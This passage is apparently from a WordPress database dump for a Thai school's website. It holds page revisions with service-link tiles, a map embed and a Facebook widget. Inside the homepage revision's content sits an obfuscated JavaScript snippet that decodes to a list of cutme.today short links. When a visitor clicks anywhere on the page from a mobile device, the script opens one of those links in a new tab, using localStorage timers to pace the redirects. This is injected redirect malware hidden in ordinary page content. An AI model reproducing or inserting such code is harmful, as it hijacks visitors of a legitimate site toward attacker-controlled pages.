#ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-03 13:38:38','2025-07-03 06:38:38','',14,'http://pakhaeng.ssk.in.th/?p=1661',0,'revision','',0),
(1663,1,'2025-07-03 13:41:33','2025-07-03 06:41:33','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a 